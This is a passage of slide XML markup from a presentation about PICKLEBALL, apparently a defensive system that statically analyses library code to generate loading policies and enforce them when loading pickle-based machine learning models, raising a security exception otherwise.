                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1165">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1165">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1165">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Static Analysis</a:t>
            </a:r>
            <a:endParaRPr sz="1165">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Google Shape;729;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="383200" y="2317650"/>
            <a:ext cx="671100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="l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000">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.py</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730" name="Google Shape;730;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471475" y="2420175"/>
            <a:ext cx="671100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="l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000">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.py</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Google Shape;731;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572225" y="2558350"/>
            <a:ext cx="671100" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="l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000">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>lib.py</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Google Shape;732;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242225" y="1933510"/>
            <a:ext cx="12324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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Library Code</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Google Shape;733;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242225" y="3437621"/>
            <a:ext cx="1232400" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="l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200">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Class Definition</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Google Shape;734;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5556300" y="2214006"/>
            <a:ext cx="1359300" cy="1921800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="7925">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="76150" lIns="76150" spcFirstLastPara="1" rIns="76150" wrap="square" tIns="76150">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1165">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1165">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1165">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1165">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1165">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Restricted Loader</a:t>
            </a:r>
            <a:endParaRPr sz="1165">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020481" y="1196012"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="736" name="Google Shape;736;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020481" y="1196011"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Google Shape;737;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4288737" y="3071350"/>
            <a:ext cx="854400" cy="557700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="l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000">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Loading Policy</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1367800" y="2764100"/>
            <a:ext cx="1047300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="739" name="Google Shape;739;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1602900" y="3678500"/>
            <a:ext cx="815100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="740" name="Google Shape;740;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3825575" y="3375225"/>
            <a:ext cx="356100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="741" name="Google Shape;741;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236124" y="3375236"/>
            <a:ext cx="356100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="742" name="Google Shape;742;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="-5400000">
            <a:off x="4833575" y="2269025"/>
            <a:ext cx="1218300" cy="256500"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 101159" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Google Shape;743;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4803821" y="1021691"/>
            <a:ext cx="510653" cy="476563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="744" name="Google Shape;744;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7005649" y="3061436"/>
            <a:ext cx="624000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7736600" y="2216600"/>
            <a:ext cx="990300" cy="547500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Loaded Model</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5592275" y="1128950"/>
            <a:ext cx="14631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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Pickle Model</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Google Shape;747;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8003750" y="2876775"/>
            <a:ext cx="4560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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="Google Shape;748;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684700" y="3311600"/>
            <a:ext cx="1146600" cy="733800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Security Exception</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>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2" name="Shape 752"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="753" name="Google Shape;753;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Policy Generation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="754" name="Google Shape;754;p61"/>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755" name="Google Shape;755;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2532525" y="943025"/>
            <a:ext cx="4708200" cy="755100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>A loading policy represents all callables that could appear in any pickle program encoding a valid model.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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9" name="Shape 759"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Generation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;761;p62"/>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762" name="Google Shape;762;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185875" y="2155500"/>
            <a:ext cx="4708200" cy="1723800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Model</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
